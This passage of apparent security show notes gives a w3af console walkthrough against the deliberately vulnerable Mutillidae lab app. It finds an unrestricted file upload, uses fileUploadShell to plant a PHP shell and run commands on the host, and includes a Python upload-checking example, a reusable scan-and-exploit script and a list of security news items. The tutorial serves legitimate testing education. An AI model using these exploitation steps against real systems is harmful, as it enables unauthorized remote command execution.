|-----------------------------------------------------------------------------|
| Setting  | Value       | Description                                        |
|-----------------------------------------------------------------------------|
| verbose  | False       | True if debug information will be appended to the  |
|          |             | report.                                            |
| fileName | report.html | File name where this plugin will write to          |
|-----------------------------------------------------------------------------|
w3af/plugins/output/config:htmlFile>>> set fileName w3af-report.html
w3af/plugins/output/config:htmlFile>>> view
|----------------------------------------------------------------------------|
| Setting  | Value            | Description                                  |
|----------------------------------------------------------------------------|
| verbose  | False            | True if debug information will be appended   |
|          |                  | to the report.                               |
| fileName | w3af-report.html | File name where this plugin will write to    |
|----------------------------------------------------------------------------|
w3af/plugins/output/config:htmlFile>>>back
w3af/plugins>>> output
|----------------------------------------------------------------------------|
| Plugin    | Status  | Conf | Description                                   |
| name      |         |      |                                               |
|----------------------------------------------------------------------------|
| console   | Enabled | Yes  | Print messages to the console.                |
| gtkOutput |         |      | Saves messages to kb.kb.getData('gtkOutput',  |
|           |         |      | 'queue'), messages are saved in the form of   |
|           |         |      | objects.                                      |
| htmlFile  | Enabled | Yes  | Print all messages to a HTML file.            |
| textFile  |         | Yes  | Prints all messages to a text file.           |
| xmlFile   |         | Yes  | Print all messages to a xml file.             |
|----------------------------------------------------------------------------|
w3af/plugins>>> 

Now we have finished with the plugin configuration and need to jump back to the main w3af console section.

w3af/plugins>>> back

Finally, we are ready to kick off the w3af scan with the start command. Just as with the GUI, this runs the discovery plugins first and then the audit plugins against every URL and injection point discovery found. Let's see what this looks like.

w3af>>> start
New URL found by webSpider plugin: http://192.168.117.1/mutillidae/audit/file_upload/uploader.php
Found 2 URLs and 3 different points of injection.
The list of URLs is:
- http://192.168.117.1/mutillidae/audit/file_upload/
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php
The list of fuzzable requests is:
- http://192.168.117.1/mutillidae/audit/file_upload/ | Method: GET
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php | Method: GET
- http://192.168.117.1/mutillidae/audit/file_upload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE="100000", uploadedfile="")
Starting fileUpload plugin execution.
A file upload to a directory inside the webroot was found at: "http://192.168.117.1/mutillidae/audit/file_upload/uploader.php", using HTTP method POST. The sent post-data was: "MAX_FILE_SIZE=100000&uploadedfile=<file_object>". The modified parameter was "uploadedfile". This vulnerability was found in the requests with ids 15 and 22.
Finished scanning process.
w3af>>> 
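The finding above came from the fileUpload audit plugin. The check it automates, written out here as an added example (my code, not w3af's own plugin): build the multipart POST that the fuzzable request shows (MAX_FILE_SIZE plus the uploadedfile part), upload a file whose body is a random marker, then look for that marker at the URLs the file would be served from if uploader.php wrote it straight into the webroot. The FakeUploadServer standing in for uploader.php is constructed for this example; its hardened mode shows what a safe handler does differently (random name, no client-supplied extension, storage outside the served tree). The sub-directory list in candidate_urls is an assumption, not w3af's exact search list.

```python
"""Added example (not w3af's own code): the check that the fileUpload audit
plugin automates, run against a constructed stand-in for uploader.php."""
import re
import secrets
from urllib.parse import urljoin, urlsplit, urlunsplit

FORM_URL = "http://192.168.117.1/mutillidae/audit/file_upload/uploader.php"
FORM_FIELDS = {"MAX_FILE_SIZE": "100000"}   # the other POST parameter w3af listed


def build_multipart(fields, file_field, filename, content):
    """Encode text fields plus one file part as multipart/form-data.
    Returns (Content-Type header value, body bytes)."""
    boundary = "----w3afExampleBoundary" + secrets.token_hex(8)
    chunks = []
    for name, value in fields.items():
        chunks.append((f'--{boundary}\r\nContent-Disposition: form-data; '
                       f'name="{name}"\r\n\r\n{value}\r\n').encode())
    chunks.append((f'--{boundary}\r\nContent-Disposition: form-data; '
                   f'name="{file_field}"; filename="{filename}"\r\n'
                   f'Content-Type: application/octet-stream\r\n\r\n').encode()
                  + content + b"\r\n")
    chunks.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(chunks)


def parse_upload(content_type, body):
    """Minimal multipart parser used by the fake server: return
    (client-supplied filename, file bytes) of the first file part."""
    boundary = content_type.split("boundary=", 1)[1].encode()
    for part in body.split(b"--" + boundary):
        if b"\r\n\r\n" not in part:
            continue
        head, data = part.split(b"\r\n\r\n", 1)
        match = re.search(rb'filename="([^"]*)"', head)
        if match:
            return match.group(1).decode(), data[:-2]   # drop the trailing CRLF
    raise ValueError("no file part in request body")


def candidate_urls(form_url, filename,
                   subdirs=("", "uploads/", "upload/", "files/")):
    """URLs the file would be served from if the handler wrote it into the
    webroot: the form's own directory, a few common upload sub-directories
    (an assumption, not w3af's exact list), and the same under each parent."""
    parts = urlsplit(form_url)
    dir_path = parts.path.rsplit("/", 1)[0] + "/"
    urls = []
    while True:
        for sub in subdirs:
            url = urlunsplit((parts.scheme, parts.netloc,
                              dir_path + sub + filename, "", ""))
            if url not in urls:
                urls.append(url)
        if dir_path == "/":
            return urls
        dir_path = dir_path.rstrip("/").rsplit("/", 1)[0] + "/"


def check_unrestricted_upload(transport, form_url, file_field, fields,
                              extension="txt"):
    """Upload a file whose body is a random marker, then fetch each candidate
    URL and return the first one that serves the marker back (None if none).
    `transport` is any callable (method, url, headers, body) -> (status, body)."""
    marker = secrets.token_hex(16).encode()
    filename = f"w3af_{secrets.token_hex(4)}.{extension}"
    ctype, body = build_multipart(fields, file_field, filename, marker)
    transport("POST", form_url, {"Content-Type": ctype}, body)
    for url in candidate_urls(form_url, filename):
        status, resp = transport("GET", url, {}, b"")
        if status == 200 and marker in resp:
            return url
    return None


class FakeUploadServer:
    """Constructed stand-in for uploader.php. hardened=False mimics the
    behaviour w3af flagged: the file lands in the form's own directory under
    its client-supplied name. hardened=True stores it outside the served tree
    under a random name with no client-supplied extension."""

    def __init__(self, form_url, hardened=False):
        self.form_url, self.hardened = form_url, hardened
        self.webroot = {}        # url -> bytes a GET returns
        self.private_store = {}  # id -> bytes, never served directly

    def __call__(self, method, url, headers, body):
        if method == "POST" and url == self.form_url:
            filename, content = parse_upload(headers["Content-Type"], body)
            if self.hardened:
                self.private_store[secrets.token_hex(8)] = content
            else:
                self.webroot[urljoin(url, filename)] = content
            return 200, b"File uploaded"
        if method == "GET" and url in self.webroot:
            return 200, self.webroot[url]
        return 404, b"Not Found"


if __name__ == "__main__":
    for hardened in (False, True):
        server = FakeUploadServer(FORM_URL, hardened=hardened)
        hit = check_unrestricted_upload(server, FORM_URL, "uploadedfile", FORM_FIELDS)
        print(f"hardened={hardened}: " + (f"marker served from {hit}" if hit
                                          else "upload not reachable inside the webroot"))
```

The first pass reports the marker served from the form's own directory, which is the "file upload to a directory inside the webroot" condition w3af reported; the second pass finds nothing reachable. Against a live target you would swap the fake server for a transport that actually speaks HTTP (urllib will do) with the same (method, url, headers, body) signature, and try served extensions such as html or php rather than txt, since the point of the finding is that what you upload gets executed or rendered, not merely stored.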

Now that the fileUpload audit plugin has reported a vulnerability in the application (the finding in the scan output above, just before "Finished scanning process."), we can move into the exploit phase. Here we get to use the happy little exploit command.

w3af>>> exploit

We see the possible exploit plugins by running the list command.

w3af/exploit>>> list
|-----------------------------------------------------------------------------|
| Plugin                 | Description                                        |
|-----------------------------------------------------------------------------|
| sqlmap                 | Exploits [blind] sql injections using sqlmap (     |
|                        | http://sqlmap.sf.net ).                            |
| osCommandingShell      | Exploit OS Commanding vulnerabilities.             |
| xssBeef                | Exploit XSS vulnerabilities using beEF (           |
|                        | www.bindshell.net/tools/beef/ ) .                  |
| localFileReader        | Exploit local file inclusion bugs.                 |
| rfiProxy               | Exploits remote file inclusions to create a proxy  |
|                        | server.                                            |
| remoteFileIncludeShell | Exploit remote file include vulnerabilities.       |
| davShell               | Exploit web servers that have unauthenticated DAV  |
|                        | access.                                            |
| eval                   | Exploit eval() vulnerabilities.                    |
| fileUploadShell        | Exploit applications that allow unrestricted file  |
|                        | uploads inside the webroot.                        |
| sql_webshell           | Exploits [blind] sql injections by uploading a     |
|                        | webshell to the target webroot.                    |
|-----------------------------------------------------------------------------|
w3af/exploit>>>

Since we only audited the application for file upload vulnerabilities, the fileUploadShell plugin is the obvious choice.

w3af/exploit>>> exploit fileUploadShell
fileUploadShell exploit plugin is starting.
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <fileUploadShell object (ruser: "contextsecurity\\seth" | rsystem: "CONTEXTSECURITY - Windows_NT - x86 Family 6 Model 15 Stepping 13, GenuineIntel")>
Please use the interact command to interact with the shell objects.

The PHP shell has now been pushed to the target and instantiated. As indicated by the last line of output above, we connect to it with the interact <session number> command. Our prompt changes to indicate that we are indeed running in an exploit shell, and from here we can run shell commands on the target host. Note that the shell runs with the privileges of the web server process, so the ruser and rsystem fields above (here a Windows host, running as contextsecurity\seth) tell you what you have to work with. We get back to w3af by running the endInteraction command.

w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned through the fileUploadShell shell
w3af/exploit/fileUploadShell-0>>> hostname
contextsecurity

w3af/exploit/fileUploadShell-0>>> echo %username%
seth

w3af/exploit/fileUploadShell-0>>> endInteraction
w3af/exploit>>>

Script Magic

Talking through the console interaction above may have felt like it took a really long time, but in practice it is quick and easy once you remember which menus need configuring. A very nice feature of w3af is the ability to script scans you plan to run frequently. Creating a w3af script is as easy as running a scan from the console: you simply put each command, exactly as you would type it in the console, on its own line.

target
set targetOS windows
set targetFramework php
set target http://192.168.117.1/mutillidae/audit/file_upload/
back
plugins
audit fileUpload
discovery webSpider
discovery config webSpider
set onlyForward True
back
output console, htmlFile
output config htmlFile
set fileName w3af-report.html
back
back
start
exploit
exploit fileUploadShell
interact 0
hostname
dir
endInteraction

For instance, we could save the above set of commands as a script called fileupload.w3af. Assuming that name (and a path of ~/.w3af/scripts/), we run the scripted version with the following command:


w3af_console -s ~/.w3af/scripts/fileupload.w3af

References

w3af videos: Though I enjoyed making my w3af video, I would be remiss not to mention the videos available here: http://w3af.sourceforge.net/videos/video-demos.php

Mutillidae: Thanks again to Irongeek! Check out Mutillidae at http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Stories For Discussion

  1. Snagging 56,000 Passwords? Easy! - [Mick] - Why go through all the trouble of making your own botnet when you can just snag an existing one? Researchers "stole" a botnet and were able to learn some interesting things. 56K passwords for an hour's work? Sign me up! Ethical question: can you claim to be white hat after doing something like this? IMO this is a path of the dark side.
  2. OpenID Fail? - [Mick] - Jeff Atwood at Codinghorror.com (great site btw) made a splash on May 3rd with a revelation of someone successfully assuming another person's OpenID account... HIS!!! Turns out there's quite a bit more to this story, it's worth a detailed read. Remember, your weakest link is always what you need to be concerned about. Defense in depth is a mantra for a reason.
  3. Cops take UR data - [Mick] - People abuse access to sensitive data? All. the. time. Here's an instance of cops committing fraud (yes fraud) by conducting searches on celebrities. Priva C. Eagle, mascot for personal privacy, is weeping. See what you did? You made her cry.
  4. Secure version of Windows released! - [Mick] - Microsoft makes a truly secure version of Windows! SWEET!! Great job MS! WHAT?!? Only for the US Air Force? I can no has secure? weak.  :-(
  5. Zombies up by 50% from last year - [Mick] - Zombies! Your computer wants braaaaains! Botnets create 12 MILLION *NEW* zombies. blerg.
  6. Informed P2P User Act of 2009 - [Mick] - The US House of Representatives is looking to ensure that software "provides users with a 'clear and conspicuous notice' of what it does". What?!? Folks, that ain't the problem. Is there *anyone* who doesn't know what's happening when you open up your bit torrent software and point it to copyrighted data?
  7. Mac OS X 10.5.7 Real Soon Now? - [Mick] - Rumors about Apple products and software are like peanut butter and jelly... they go so well together! Rumors about the release timing for 10.5.7 have been circulating on the Mac forums for months now. Whatever the release day is, while others are excited about new features and tweaks, I'm just hoping they patch the open zero days. Remember just because your system has an Apple icon on it does *not* mean you're secure. (yeah we know we're preaching to the choir)
  8. Old attacks New again? - [Larry] - So, remember when hiding file extensions was bad, especially when Windows Explorer misinterpreted them - it shows a Notepad document when the item was really an executable? Yeah, well MS fixed the problem, until Windows 7 RC that is.
  9. Careful where you type passwords - [Larry] - Wow, so ever wonder where those keystrokes go that you aren't typing in to the right text box - the ones that disappear into the ether. Are you actually typing them into a different window, and posting them somewhere? Well, certainly that's possible, I've done it. But what about using the same user and password on another website, and the other site stores the passwords in the clear, or easily reversible...
  10. Strike Fighter Data leaked by p2p - [Larry] - this is why I continue to miss the seewhatyoushare.com project. Go use archive.org to see the tale...
  11. How not to destroy your data - [Larry] - Wipe, yes. Melt with thermite, yes. Toss overboard into the ocean, No.
  12. New version 1.0 out - [Larry] - This is great. Now not only does it support VLAN hopping for Cisco and Avaya VOIP infrastructures, it fully supports Nortel as well!
  13. Excellent malware write-ups - [Mick] - Holy cow! This is one of the better write-ups on malware I've seen in a long time. Herr Kleissner, we'd love to have you on the show. Anyone who works in this arena, look at this work. There's a new ninja arriving. (Thanks MikeP for sending us this link!)
  14. Bypassing your corporate firewall - not a good idea - [Paul] - One of the things we stress on this show is that you should always have permission. You may choose to ignore that, but that doesn't change our stance on the issue. We act responsibly (most of the time) and ask that all of you act responsibly as well. I completely respect the guys at Hak.5, but use caution when you see (or state) something like "Corporate and university firewalls can be a particular PITA - especially if you're a gamer.". Whether you are a "gamer" or not, violating your corporate policy will get you fired.
  15. ATM Skimming Device - [Paul] - This is really a device that reads the ATM card and has a camera to record the PIN. It's slick and it works. This can also be applied to physical security.
  16. McAfee has XSS and CSRF on their site - [Paul] - Sweet! Don't they use Hacker Safe? Oh wait, they are hacker safe, but no they weren't :) Mike Bailey found this hole and poked McAfee in the eye on his blog.
  17. Security Considerations in the Design of the Human Penis - [Paul] - So this is part of Bruce Schneier's new series "Friday Penis Blog". Just way more information than I needed about the penis.
  18. Windows 7 FAIL - [Paul] - Get this, a well-known attack vector is the ability to hide the extension by doing something like "virus.jpg.exe" and Windows would hide the exe portion. So a JPG image is really an executable. Certainly they fixed this in Windows 7, NOT!
  19. LOL at l0lw0rm - [Paul] - A great write-up from the MW-Blog on how this worm works. It's funny, kinda LOLzy, like his message to AV vendors " Hello Antivirus makers. This is VXer Ravo_5002 speaking. Please call this virus W32.l0lw0rm. How the fuck do you make up these names anyways? -Rav¿" Dude, you don't get to pick.
  20. If you see something... - [Paul] - Put a wireless access point in it! This hotel puts suitcases as decorations in the lobby. What!? Yea, IED anyone? Random cell phones on the counter? What a great place to put a camera, listening device, etc...

Other Stories Of Interest

  1. Pentoo 2009.0.reallyclosetobeta - The Pentoo team has released what is hopefully the final alpha build of Pentoo 2009. Pentoo is a penetration testing LiveCD distribution based on Gentoo. Download your copy here
  2. Strange Beer Names [Paul]
  3. World's Greatest Beer Names [Paul]
  4. Double-wide trailers on the Moon! - It looks like the future of space exploration is redneck.